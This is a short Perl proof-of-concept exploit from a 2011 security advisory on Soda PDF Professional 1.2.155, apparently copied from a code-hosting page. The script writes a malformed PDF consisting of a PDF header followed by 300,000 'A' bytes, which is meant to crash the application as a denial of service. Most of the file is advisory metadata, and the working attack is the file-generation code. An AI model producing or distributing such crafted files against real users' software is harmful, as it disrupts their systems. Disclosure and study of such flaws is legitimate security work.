45 lines
No EOL
1.3 KiB
Perl
Executable file
45 lines
No EOL
1.3 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
#
|
|
# Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)
|
|
#
|
|
#
|
|
# Vendor: LULU software
|
|
# Product web page: http://www.sodapdf.com
|
|
# Affected version: 1.2.155.1729 (Professional with OCR)
|
|
#
|
|
# Summary: Increase your efficiency with Soda PDF Professional, the smart
|
|
# & simple tool for opening, creating, editing, converting, and securing
|
|
# PDF files in a collaborative environment. Save time by using powerful
|
|
# automated features like batch PDF creation, professional templates &
|
|
# document comparison.
|
|
#
|
|
# Desc: Soda PDF Pro suffers from a restriction of service (RoS) vulnerability
|
|
# when handling PDF or WWF file formats which can be exploited by malicious
|
|
# people to cause a denial of service scenario.
|
|
#
|
|
#
|
|
# Tested on: Microsoft Windows XP Professional SP3 (EN)
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# liquidworm gmail com
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2011-5056
|
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5056.php
|
|
#
|
|
#
|
|
# 10.11.2011
|
|
#
|
|
|
|
|
|
use strict;
|
|
|
|
my $file = "Midnight_in_Paris.pdf"; # or .wwf
|
|
my $tovar = "\x25\x50\x44\x46\x0A"."\x41" x 300000;
|
|
print "\n\n[*] Creating $file file...\n";
|
|
open ZSL, ">./$file" || die "\nCan't open $file: $!";
|
|
print ZSL $tovar;
|
|
print "\n[.] File successfully mounted!\n\n";
|
|
close ZSL; |